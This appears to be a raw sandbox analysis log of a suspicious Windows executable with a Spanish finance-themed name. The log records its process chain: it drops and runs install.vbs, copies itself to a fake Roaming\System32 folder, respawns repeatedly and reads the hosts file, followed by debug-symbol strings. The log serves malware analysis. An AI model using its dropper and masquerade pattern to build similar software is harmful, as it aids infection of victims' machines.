Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe ReversingLabs: Detection: 10%
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe File read: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
Source: unknown Process created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe 'C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe'
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1448
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1476
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe Static file information: File size 1912320 > 1048576
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1b5a00
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbH{ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721117453.000000000458B000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733685179.0000000004F2D000.00000004.00000001.sdmp
          Source: Binary string: PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: ml.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.pdb99zz source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb> source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: bcrypt.pdb1 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb8 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB@Jh source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbtE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbkE source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: CLBCatQ.pdbC source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp
          Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: ole32.pdbX source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: rsaenh.pdb+ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdbY source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdbv source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb7 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: propsys.pdba source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb, source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbWS source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdbs source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb7cZ^ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: WLDP.pdbl source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb2 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbq source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: iVisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb, source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb~ source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.668176403.00000000030C2000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721203841.00000000006C0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.734239841.000000000327F000.00000004.00000001.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
